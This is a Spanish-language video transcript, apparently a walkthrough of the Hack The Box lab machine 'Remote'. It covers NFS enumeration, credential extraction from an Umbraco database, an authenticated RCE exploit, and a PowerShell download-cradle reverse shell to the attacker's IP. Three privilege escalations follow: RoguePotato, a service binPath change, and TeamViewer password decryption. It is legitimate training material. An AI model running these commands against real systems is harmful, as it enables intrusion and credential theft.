¿Qué tal, ingenieros? Su amigo Plaintex de este lado. Sí, todavía estoy por acá. Yo sé que no me han visto tan activo como comúnmente acostumbro. La verdad es que he estado trabajando algunas certificaciones. Ya terminé una de ellas, la de Red Team Operator de Zero Point Security. Esa fue súper interesante, me encantó. Creo que es uno de los materiales, o sea, una de las certificaciones que más me ha gustado. Creo que es, en cuanto a material, contenido y demás, mi favorita hasta el momento. Así que les sugiero que la puedan revisar. Estoy haciendo ahora la de Pentester Academy, la del banco gigante, este súper grande. Ya terminé el laboratorio y ahora estoy esperando la fecha del examen, que va a ser en algún momento a finales de mes. Así que nada, desédenme suerte. Mientras tanto, pues, les traigo Remote de Hack the Box. Fue una máquina que hice antes de empezar todo esto y que me gustó mucho la parte de acceso. Relativamente fácil, pero igual, siempre ayudándonos a conectar puntos. Y la parte de escalación de privilegios, digamos que fue la más interesante porque encontré tres métodos para escalar privilegios que se los voy a mostrar ahora. Así que nada, empecemos. Muy bien. Lo primero que vamos a hacer es correr en MAP, SC para los scripts default y SV para las versiones. La dirección IP es 10.10.180 y esto lo vamos a mandar a enmap.tsp. Y a esto yo lo corrí, así que vamos a ver qué tenemos por acá. Tenemos el puerto 21, que permite acceso anónimo. Luego tenemos el puerto 80, que es una página web. Aquí tenemos el banner, nada fancy. Y tenemos RPC, o Remote Procedure Call. Control que nos permite, pues, ver algunos... Nos permite sacar información de la máquina. Y aquí, pues, tenemos información sobre puertos UDP abiertos. Este puerto abierto tenemos NFS, que hace referencia a File Server o alguna forma de archivos compartidos que puedan estar montados en este servidor. Eso lo vamos a ver en un rato. Y demás. Los puertos comunes de conexión, el SMB, y aquí tenemos este que ven acá, el Mount. Este es súper interesante, así que manténganlo en la mente, porque lo vamos a usar en un ratico. Cuando comúnmente encuentro tantos puertos en una máquina, el FTP, que es súper sencillo y como permite acceso anónimo, es el que vamos a revisar de primero para ver si encontramos algún archivo. No hay nada en este equipo, así que no nos vamos a preocupar ya por seguir mirando para allá. Luego, pues, lo que hago es revisar la web para que voy a ver que voy encontrando. Mientras tanto, pues, vamos corriendo WFOS. Vamos a correr, decirle que ponga los colores. User, Cher, Wordless, Dibuster, Directory, Small. Le vamos a decir que oculte en los 404, que utilice 100 threads al mismo tiempo, y le pasamos la dirección IP que queremos revisar con la palabra FUS. Esto básicamente lo que va a hacer es que va a sustituir todas las palabras que estén aquí por esto. Y ahí le damos. Vamos corriendo acá. Mientras tanto, vamos revisando la página web. En esta página no hay información. Fíjense que él dejó la información default. Puede ser que nada de lo que encontremos aquí sea útil, y más bien necesitemos encontrar un directorio o algo. Aquí está People. Siempre es importante cuando podemos ver, digamos, nombres de personas, porque pueden hacer referencia a usuarios que hayan dentro del equipo. Aunque no necesariamente es el caso ahora. Fíjense que son nombres, que eso lo pudiéramos tocar en el caso que sea necesario. Tenemos una de intranet, que también pudiera ser interesante, porque pudiera ser referencia a otra página web dentro de este servicio, que no es el caso. Igual, les voy dando un poquito como lo pienso. Entonces, aquí ya vemos algunas cosas como esta, que hace una redirección. El 302 nos hace una redirección cuando vamos al install. Lo voy a cancelar para no hacerlo más lento, porque ahí tenemos ya lo que necesitamos. Vamos a install, y nos manda a esta página de Umbraco. Podemos intentar el simple admin-admin, quizás el admin para intentar algo de SQL Injection, pero la verdad es que por más que intentemos, no vamos a encontrar nada. Así que lo que hice en este momento fue, bueno, como tengo un login, voy a ir atrás al enmap, y voy a ver qué puedo hacer con la información que ya tengo dentro del enmap. Como recordarán, en el enmap nosotros vimos este puerto que está utilizando el sistema de archivos. Entonces, en el caso que nunca lo hayan visto ese puerto, lo que comúnmente yo les sugiero es simplemente buscarlo. Aquí el puerto 2049, que es el mount, pongo así 2049, lo pueden buscar así, y fíjense este, habla de un pentesting service sobre ese puerto, y aquí nos da ciertas informaciones, en el caso de que ustedes no estén familiarizados, digamos, con él. Hay algunos scripts de enmap, que incluso nos van a dar información de esto, así que vamos a utilizarlos en scripts de enmap. Usamos script, y le ponemos nfs, vamos al puerto del rpc, o sí, creo que es solo al puerto del rpc, y le vamos a hacer a la dirección IP, 180. Perfecto. Entonces, fíjense que el script de enmap, nos trajo que el script nfsl, nos dice que hay un volumen, o sea que este equipo está escuchando, y tiene una carpeta compartida, que se llama site backups, o sea que eso nosotros vamos a poder montarlo, con esta opción que ustedes pueden ver acá, esta que está aquí. Nos va a permitir montar ese sistema de archivo. Así que vamos a hacer esto, vamos a crear un directorio, que se llame remote.nfs, y entonces vamos a utilizar el mount, vamos a ver sudo, sudo mount tnfs, vamos a la dirección IP, que es la 10, 10, 10, 180, y le ponemos el site, dos puntos, el site, site backups, y decimos que queremos poner eso en remote, en el directorio que creamos. Usamos el password, o sea, estoy utilizando sudo aquí, por eso es el password, no es que necesiten el password del mount, es simplemente porque estoy utilizando la nueva versión de Kali, que no usa el sudo por default, o sea no está en root, sino en usuario, y por ende entonces tengo que pasar sudo, cuando necesito hacer algún comando, necesito privilegios, si uso netstat, aquí no tengo nada, remote, aquí está, perfecto, lo que tendría que hacer es, netstat, no, lo que quería ver era la conexión, pero bueno, no voy a perder tiempo con eso, aquí ya tengo el archivo montado, fíjense que ahora tengo acceso a esos directorios, y que voy a buscar aquí, bueno, puedo, no sé que voy a buscar, pero el web config, llama mi atención, porque es un archivo comúnmente, que tiene información sobre, pueden contener el password, pueden contener información sobre un directorio en particular, pero comúnmente los web config, tienen lo que es el connection stream, el connection stream, es, yo lo puedo buscar, connection, aquí está, el connection stream, comúnmente, es, el parámetro, que define, como la aplicación web, se va a conectar con la base de datos, y así, esto comúnmente tendría, la base de datos, y posiblemente el usuario, y el password, para conectarse a la base de datos, que si es el caso, puede ser que lo esté utilizando, en la aplicación web, y ahí podríamos tener acceso, entonces, este, creo que, ups, aquí está, connection stream, y nos dice, que la base de datos, es, un braco, SDF, esto es un sistema, de, de base de datos, que se utiliza en Microsoft, local, y no tiene, fíjense que no tiene, no tiene usuario password, o sea, que parece que la base de datos, no está protegida, lo que podemos hacer, es hacer un find, acá, name, la base de datos, se llama, un braco, esto es para ver, si la base de datos, está, entre todos estos directores, porque, recuérdense que son muchos, fíjense, son varios directorios, y si quiero, quizá, no perder el tiempo, buscándolo, pues, lo puedo hacer así, fíjense que lo encontró, la base de datos, así que vamos a copiar, la base de datos, de app data, un braco, nos la vamos a llevar, a, nuestro equipo, bien, esto contiene data, cuando yo estuve haciendo la máquina, pues, lo que hice fue, utilizar streams, un braco, para solamente mostrar los, las 10 primeras líneas, vamos a cancelar esto ya, aquí muestro las 10 primeras líneas, ustedes pudieran también, utilizar, alguna, hay algunas aplicaciones, que permiten abrir, este tipo de archivos, y ver las tablas, la estructura, y demás, pero digamos, para simplificarme la tarea, pues, simplemente utilicé, streams, para ver el contenido, que está en texto plano, dentro de esta estructura, y aquí, como pueden ver, en las primeras líneas, aparece, el administrator, que puede ser el grupo, tiene admin, que puede ser el password, y tiene aquí un hash, que como pueden ver acá, dice que es un chat 1, tiene aquí, algunos otros usuarios, como smith, arroba, htb, punto local, y bueno, aquí está, tiene aquí el admin, también, admin, arroba, local, lo que vamos a hacer, es que vamos a buscar, este hash, en internet, para ver si alguien, ya lo craqueó, aquí vemos, en la primera línea, nos dice que es, bacon and cheese, bien, ese es el hash, pues, vamos acá, intentamos este, admin, hack the box, bacon and cheese, vamos a ver si funcionó, digo, yo sé que va a funcionar, pero, debería entrar, el access, vamos a ver si lo copié bien, si ahí entró, bien, entonces, ya estamos dentro, de una aplicación, en el caso, que no sepan, pues, un bravo, es un, cms, que, básicamente, permite manejar contenido, y demás, entonces, lo que, debemos saber, es si hay alguna vulnerabilidad, en un bravo, pero, que un bravo, entonces, lo que yo busco, siempre, es la versión, que, de este un bravo, o de esta aplicación, en el help, comúnmente, da esa información, y si se fijan, aquí nos dice, que la versión de un bravo, es la 712.4, si ahora, con esta información, yo busco en internet, un bravo, y le pongo, por ejemplo, exploit, puede darme, o no, información al respecto, aquí, si tengo información, y en este github, tenemos, un exploit, que, abusa, digamos, de ciertos componentes, dentro de este, de esta aplicación, para darnos ejecución, de comandos, y necesitamos, proveerle, un usuario password, para nuestro caso, pues ya lo tenemos, ya que, en este caso, pues vamos a descargarlo, no, git clone, fíjense, que aquí tenemos, requirements, entonces, le dan, python, 3, install, r, requirements, pip, install, requirements, en el caso, de que no lo tengan, y vamos, python 3, exploit, bien, entonces, tenemos que pasarle, un usuario, que sería, admin, arroba, hack the box, punto local, el password, bacon, en cheese, el host, que sería, http, 10, 10, 10, 180, y, un braco, y el comando, que queremos ejecutar, es vm, aquí falla, si, no sé por qué, cuando lo pongo, de esta forma, me falla, pero, puede ser que lo haga por default, la verdad es que no me fijé, en el script, vamos a revisarlo ahora, sudo, sub, exploit, umbraco, rc, exploit, exploit, exacto, falla es porque él busca, la dirección directamente, fíjense acá, o sea, no tengo que poner el umbraco, ya él lo está, ya, llamando, entonces, le quito el umbraco, le doy, who am I, y como pueden ver, ahí tenemos, ejecución de comandos, dentro del equipo, lo próximo sería, que nosotros, tengamos un shell, la forma, más fácil, sería utilizando, PowerShell, fíjense que aquí, el creador, pues nos da, la opción, que podemos utilizar, para esto, pasar un argumento, con la A, y aquí nos da un ejemplo, de cómo pudiéramos ejecutarlo, lo que vamos a hacer, es que vamos a hacer, un rebel shell, rebel shell, power shell, no, power shell, reverse shell, hay un one liner, es este, esto lo vamos a descargar, wget, y vamos a crear, un directorio, donde vamos a pasar nuestros, a los archivos, que vamos a compartir, movemos el power shell, le ponemos rebel shell, para simplificarnos la vida, y vamos a editar este, vamos a utilizar, mi dirección IP, sería la 15, 248, vamos a confirmar, if config, tune 0, 15, 248, grabamos, este, listo, entonces, lo otro que quiero hacer es, bueno, vamos a usar, invoke expression, no, power shell, power shell, estos son los argumentos, sería, knob, execute bypass, knob, el comando, invoke expression, new object, net, web client, then load, string, HTTP, 10, 10, 15, 148, reverse shell, PS1, listo, y aquí ponemos, Python 3, m, HTTP server, 80, no funciona, porque tenemos que correrlo como sudo, listo, y ponemos nuestro river shell, wrap, esto es básicamente para, lo he utilizado antes, no tanto lo uso, pero, nos permite simplemente poder hacer, darle hacia arriba y hacia abajo, sin tener que dañar nuestra conexión, nuestro shell, sudo, la falta de costumbre, y creo que estamos listos acá, ok, bien, esto simplemente falló, falla es por la, como, como él maneja los quotes, el, la aplicación, entonces, en vez de yo, pues, ponerle estos quotes, acá, lo que voy a hacer, es que voy a convertir esto, codificarlo, en un encode command, entonces, para eso usamos, echo, menos n, ponemos el código, eh, el base64, de PowerShell, y el base64, tradicional, no es el mismo, porque primero, se hace una conversión, eh, a UTF 16, eh, si buscan, PowerShell, linux, base64, aquí hay una persona, pues, que habla, habla un poquito, de la diferencia, de, cuando PowerShell convierte, y cuando convierte, y cuando convertimos, el base64, tradicional, y aquí está el comando, que hoy usaríamos, y con, y con B, le pasamos esto, para hacer la conversión, a UTF 16, luego decimos, base64, y le decimos, que queremos esto, en una sola línea, y imprimimos un eco, listo, copiamos, y vamos a sustituir, esta parte, por nuestro comando, en Enter, fíjense que aquí recibimos, y se supone que, deberíamos tener un shell, que no tenemos, pero el archivo se descargó, puede ser que el rebel shell, no esté correcto, ah, fue que lo puse, en el puerto 80, 443, cancelamos, ahora si ejecutamos, entonces el code command, va a descargar, el rebel shell, en el puerto 80, y va a crear, una conexión, hacia nuestro equipo, en el 443, voy a mover la conexión, de esta vista, a una vista nueva, RL wrap, en sí, el BMP 443, y ahora si, vamos Enter, descargó el archivo, y aquí tenemos nuestra conexión, who am I, somos IIS pool, bien, entonces, estos, estos, los usuarios, que son de IIS, comúnmente, tienen privilegios, vamos a verlo, tienen este privilegio, de impersonar, a los usuarios, y hay un exploit, conocido, para este tipo, de privilegio, que es el juicy potato, sin embargo, sin embargo, si vamos a, asisten info, podrán ver, que este servidor, es Windows Server 2019, que sucede, que Windows Server 2019, tiene, está pachado, contra juicy potato, y mientras, estuve en esta máquina, me había parecido, en algún momento, haber un tweet, de, no recuerdo el nombre, pero lo vamos a buscar ahora, juicy potato, aquí está, me había parecido, haber visto, un tweet, donde se hablaba, de juicy potato, Windows Server, 2019, o sea, que aunque lo pacharon, ellos encontraron, otra forma, y le cambiaron el nombre, ya no se llamaba, juicy potato, y se lo voy a buscar ahora, el roach potato, pero creo que no tengo el, creo que no tengo la referencia, al blog post, aquí a mano, pero lo vamos a buscar, roach potato, github, por eso es que bueno, siempre, quizá mantenerse, roach potato, creo que si no me equivoco, déjenme buscar, ttttttt, aquí en mis notas, como es que se llama, es así mismo, roach potato, pero no está apareciendo, el, el github, vamos a buscarlo, roach potato, potato, github, ahora sí, creo que lo estaba escribiendo mal bien, entonces, aquí está decoder, esta es la persona, sorry, decoder yo había leído este post hace, digamos algunos meses posiblemente, donde él explica cómo a pesar del feeds que se le hizo, él encontró nuevamente otra forma de poder hacer el trigger de la vulnerabilidad, le sugiero que lo puedan leer para que puedan entender un poquito mejor qué fue lo que él hizo, y básicamente él abusa ciertas características del sistema operativo al conectarse hacia una recesión remota y simular nuevamente la parte de impersonalización de este caso del usuario NT Authority System entonces, lo que vamos a hacer es que vamos a descargar este exploit y lo vamos a utilizar lo grabamos y vamos a ver las indicaciones este es un poco diferente, así que ya verán vamos a irnos a users aquí tenemos public ahí está el flag y nos vamos a document y aquí vamos a descargar el juicy potato esto lo podemos cancelar ya, no debería afectar nuestro shell vamos atrás y vamos a y vamos a y vamos a y ahí tenemos este es el archivo que queremos utilizar somos wget uri http 1010 15248 out file aquí lo tenemos y lo otro que vamos a hacer es que vamos a crear un bat file rebel shell punto bat y aquí vamos a poner power shell execute bypass no encode command y vamos a buscar el comando codificado que utilizamos copy sin la nueva línea vamos a decirle que queremos ver en wordwrap listo esto es básicamente porque vamos a vamos a pasarle un solo archivo pudiéramos crear un rebel shell con mfbenum en un punto exit pero creo que esta forma es más simple por decirlo de alguna forma bien listo entonces vamos a ver las indicaciones nuevamente lo otro que necesitamos es hacer este cambio dentro de la máquina nuestra o sea en nuestro Kali porque lo que el va a hacer es que va a conectarse a nuestro Kali para simular una conexión local dicho de una forma simple entonces cambiamos esta dirección IP por la dirección IP de nuestro del servidor y esta sería nosotros que escucharíamos en esa fíjense que yo no estoy escuchando en el puerto 135 cuando le doy aquí enter ahora si estoy escuchando en el puerto 135 y simplemente voy a hacer una redirección hacia el servidor en este caso perfecto entonces ya tenemos parte de lo que necesitamos lo otro sería descargar el punto VAT aquí tenemos el punto VAT y ROG que Poteiro vamos a la R que es la dirección IP de nuestro equipo luego vamos a le pasamos E y la E sería lo que nosotros queremos correr sería users public documents Riverchel punto VAT luego le pasamos el puerto sería el 999 y por aquí tenemos otro Riverchel en el 443 para si funciona nosotros poder tener la conexión vamos a enter y aquí viene nuestro shell UMI somos NT Authority System la verdad es que es súper súper interesante ver a a a decoder como él conoce bastante bien como funciona toda esta parte de los tokens y tiene esa capacidad de recrearlo así que simplemente aquí ya tenemos al al nuevo Juicy Potato para 2019 esta es la digamos la primera forma que encontré luego uno de los chicos me dijo mira que encontré otra forma yo interesante y empecé a buscar las demás y vamos a empezar como si no tuviéramos nada cierro acá cierro acá imaginémonos que todavía no hemos encontrado nada que yo que haría lo próximo sería utilizar PowerUp el PowerUp es un script que nos permite hacer enumeración de posibles vulnerabilidades dentro de para escalación de privilegios así que vamos a entrar a www descargamos PowerUp y también vamos a buscar otro que se llama Invoke Prevesc Check que hace lo mismo de otra forma y tiene también información útil que no tiene el PowerUp Wget aquí lo tenemos los dos y vamos a descargar estos dos scripts PowerUp .ps1 PowerUp .ps1 listo y el otro sería Invoke de Invoke Prevesc Check .ps1 Invoke Prevesc Check .ps1 listo entonces hacemos Import Module PowerUp PowerUp y le decimos Invoke All Checks que es dentro de PowerUp lo que va a revisar digamos todo en pocas palabras esperar que termine listo y aquí pues PowerUp nos dice nos habla de los privilegios fíjense que los privilegios que tiene el C Impersonate que es súper importante y por eso PowerUp lo menciona digamos que es algo que yo tengo cíclico que siempre lo busco y aquí nos dice también que este servicio nosotros podemos reiniciarlo y podemos o sea podemos modificarlo PowerUp tiene ya esta función que nos permite hacerlo sin embargo cuando la estuve utilizando en este equipo por alguna razón no funcionaba se supone que al yo correr este comando él va a agregar un usuario que se llama John con este password pero si ustedes se fijan NetUser el usuario nunca se agrega entonces como esto no funcionó pues lo hice manual que sería lo mismo pero con la funcionalidad de Microsoft del sistema operativo hago un config bin path para modificar la ejecución esto va a hacer que esto va a hacer que el servicio no encienda de forma satisfactoria pero igual va a hacer la conexión si ustedes quisieran mantener persistencia tendrían que crear un servicio y eso lo pueden hacer con Visual Studio por ejemplo o incluso en MF Venom hay un payload que te permite crear un servicio pero vamos a simplificarnos la vida y vamos a utilizar el mismo método que utilizamos aquí copy paste ahí fíjense que nos dice que el servicio fue modificado de forma satisfactoria y lo mismo aquí estamos escuchando el puerto 443 y ahora lo que tenemos que hacer es detener el servicio y luego reiniciarlo cuando lo reinicie él va a ejecutar nuestro script como pueden ver acá o en mi somos anti-authority system el segundo cuál es el tercero la tercera forma de escalar privilegios que no no la conseguí con con power up sino con invoke de hash entonces hacemos import module invoke perdón di que de hash invoke previst check tengo un bug de hash en mi mente invoke previst check y lo mismo este script va a revisar patrones dentro de la configuración que nosotros pudiéramos abusar para tratar de escalar privilegios un ratito vamos mientras tanto a dejar nuestro netcat que lo vamos a bueno no no vamos a necesitar netcat en este este no es con netcat pero va vamos a esperar ahí unos segunditos adicionales que que este script termine me gusta este script porque la forma en que hace la búsqueda es haciendo más uso del registro o sea que aunque hayan ciertos componentes de PowerShell que estén bloqueados este script tiende a funcionar vamos a ver que encontramos acá nos habla de DLL hijacking esto no lo vamos a utilizar cuando yo estuve haciendo el video pues o sea cuando estuve repasando algunos de los componentes del video vi que esto hubiese podido ser otro método porque no requiere el reboot pero no no lo probé entonces aquí habla de servicios que ese fue el que el que abusamos y por eso aquí el fíjense que está nuestro script y lo otro es que él nos dice que aplicaciones hay instaladas dentro de este sistema operativo que no son comunes y aquí tenemos este querido amigo TeamViewer que hace TeamViewer en una máquina de hack the box para los que no conocen TeamViewer es una aplicación que permite hacer administración remota de los equipos básicamente tú estás en tu casa tú le pasas un ID a otra persona y esa persona se puede conectar remoto hasta tu equipo sin hacer uso digamos de abrir un puerto ni nada por el estilo sino por la aplicación una forma de reverter puesto de alguna de forma simple entonces nada pues vamos a buscar si hay una forma de que algún exploit para TeamViewer y pues me encontré con este que habla de que TeamViewer guarda los passwords encriptados con este AES o este modelo de encriptación y que la llave está guardada dentro del registry y el usuario tiene acceso a la llave en pocas palabras se pueden leerlo para que entiendan un poquito todo lo que el comentario que le hace alrededor de esto pero en pocas palabras la llave de para desencriptar el password de TeamViewer que TeamViewer básicamente te permite bueno quiero guardar el password para que no tenga que estar suministrando lo siempre ese password nosotros podemos desencriptarlo con la misma información del sistema que es lo que vamos a hacer ahora entonces nada vamos a seguir los pasos para confirmar sabemos que está ahí porque ya lo revisamos pero igual lo voy a hacer ahí está el el servicio no voy a utilizar este TaskViewer porque no me interesa estos son los que necesitamos buscar y él creó este script en Python para desencriptarlo vamos a guardar este script por acá en algún lado pongamos TeamViewer password decrypt lo guardamos y si se fijan este es el que necesitamos modificar que ese es el string que está cifrado volvemos a nuestro equipo y al post y él creó este módulo de MetaExploit como yo no quiero usar MetaExploit o como no quise usar MetaExploit en aquel momento lo hice manual él básicamente lo que va a buscar es la llave dentro del registry vamos a buscarla nosotros dejamos Red Query el local machine software wow6432 node TeamViewer y la versión que tenemos en la 7 no estoy ok aquí viene entonces fíjense acá este sería el security password AS que es el el componente encriptado o cifrado lo modificamos lo guardamos fíjense que para hacer uso del script en el caso de que les falle yo lo tengo instalado pero python3 no es python2 pip install pcrypto tienen que instalar el pcrypto ya yo lo tengo y tendrían que instalar el hex dump que comúnmente yo también lo tuve que instalar ya como lo tengo ambos pues entonces vamos a correr tenemos python y este es el password remote copiamos damos psx administrador le pasamos el password le decimos el equipo al que no queremos conectar y le damos enter y esto nos da también acceso como administrador super interesante la máquina la verdad es que si ustedes hacen las máquinas para aprender y no necesariamente para capturar el flag pueden encontrar este tipo de cosas escenarios que le permitan aprender cosas diferentes aquí vimos tres métodos de escalar privilegios así que creo que es un excelente ejercicio para ustedes para poder encontrar diferentes cosas dentro del equipo y puede ser que hayan más y yo me cansé de buscar pero les dejo la tarea que puedan seguir investigando y quise encontrar otro método de escalar privilegio espero que les haya gustado y nos vemos en la próxima